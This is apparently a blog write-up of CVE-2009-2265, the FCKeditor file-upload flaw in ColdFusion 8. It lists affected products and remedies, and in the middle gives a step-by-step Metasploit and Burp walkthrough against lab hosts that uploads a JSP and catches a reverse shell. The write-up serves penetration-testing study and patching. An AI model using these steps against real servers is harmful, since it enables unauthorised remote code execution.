Multiple vendor applications that utilize FCKeditor could allow a remote attacker to traverse directories on the system and upload arbitrary files. A remote attacker could exploit this vulnerability using directory traversal sequences in the CurrentFolder parameter to several connector modules to view arbitrary files or upload malicous executable files on the system.

Affected Products

  • FCKeditor FCKeditor 2.2
  • FCKeditor FCKeditor 2.0
  • FCKeditor FCKeditor 2.4.3
  • FCKeditor FCKeditor 2.3 beta
  • Fckeditor Fckeditor 2.0 FC
  • Fckeditor Fckeditor 2.0 Rc2
  • Fckeditor Fckeditor 2.0rc2
  • Fckeditor Fckeditor 2.0rc3
  • Fckeditor Fckeditor 2.6.4
  • Fckeditor Fckeditor 2.4.2
  • Fckeditor Fckeditor 2.6.3 Beta
  • Fckeditor Fckeditor 2.6.3
  • Fckeditor Fckeditor 2.6.2
  • Fckeditor Fckeditor 2.6.1
  • Fckeditor Fckeditor 2.6
  • Fckeditor Fckeditor 2.5.1
  • Fckeditor Fckeditor 2.5
  • Fckeditor Fckeditor 2.5 Beta
  • Fckeditor Fckeditor 2.4.1
  • Fckeditor Fckeditor 2.4
  • Fckeditor Fckeditor 2.3.3
  • Fckeditor Fckeditor 2.3.2
  • Fckeditor Fckeditor 2.3.1
  • Fckeditor Fckeditor 2.3
  • Fckeditor Fckeditor 2.1.1
  • Fckeditor Fckeditor 2.1
  • Fckeditor Fckeditor 2.6.4 Beta

Dependent Product

  • Adobe ColdFusion 8.0
  • Adobe ColdFusion 8.0.1
  • ClanSphere ClanSphere 2009.0
  • Debian Debian Linux 5.0

Exploitation (Metasploit)

1. First we can visit the log in page to find out what version of ColdFusion this is

Note. Here we see ColdFusion 8

2. Now, we can search for “ColdFusion 8” exploits using searchsploit

  • searchsploit coldfusion 8

3. We found an interesting one

  • ColdFusion 8.0.1 – Arbitrary File Upload / Execution (Metasploit)

4. We open Metasploit, and, search for a ColdFusion Module

  • msfconsole
  • search coldfusion
  • use exploit/windows/http/coldfusion_fckeditor

5. Now, we will see what options are available

  • show options

Note: Interesting options are RHOSTS, RPORT, LHOST, LPORT, PAYLOAD

6. We will now edit the required variables, and, run the exploit

  • set RHOST 10.10.10.11
  • set RPORT 8500
  • set LHOST 10.10.14.19
  • exploit

Note. We see the exploit executed but the file filed to upload.

7. We will send this traffic to a proxy to find out what is going on. I will use BurpSuite. I will redirect the traffic to this tool

  • set RHOST 127.0.0.1
  • set RPORT 8080

8. In BurpSuite, I edit the proxy to receive traffic on port 8080 and redirect it to 10.10.10.11:8500

  • Proxy – Options – Edit Listeners

9. Run the exploit again. In BurpSuite, we will see the request from our machine

10. Send it to Repeater, and, resent it. We get the same “Failed to upload” in Metasploit, however, based on the server response we get a 200 OK

11. The response indicates that the file has been uploaded to /userfiles/file directory, and, the filename is XXA.jsp

12. We now know that the file is getting uploaded. I will use Metasploit to start a listener (use the same payload and options as in the previous eploit) and then execute this file from the server from the web browser

  • use exploit/multi/handler
  • set payload generic/reverse_shell
  • set LHOST 10.10.14.19
  • exploit

13. Now that we have the listener started. We will execute the script from the server

  • http://10.10.10.11:8500/userfiles/file/XXA.jsp

14. Checking the listener we get the reverse shell

  • whoami

Remedy

For FCKeditor:

  • Upgrade to the latest version of FCKeditor (2.6.4.1 or later), available from the FCKeditor Web site.

For Knowledgeroot:

  • Upgrade to the latest version of Knowledgeroot (0.9.9.1 or later), available from the Knowledgeroot Web page.

For ClanSphere:

  • Upgrade to the latest version of ClanSphere (2009.0.2 or later), available from SourceForge.net: Files.

For Adobe ColdFusion:

  • Refer to APSB09-09 for patch, upgrade or suggested workaround information.

Resources

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2265

https://exchange.xforce.ibmcloud.com/vulnerabilities/51569

https://www.rapid7.com/db/modules/exploit/windows/http/coldfusion_fckeditor/

Categories: Windows Exploitation

0 Comments

Leave a Reply

Your email address will not be published. Required fields are marked *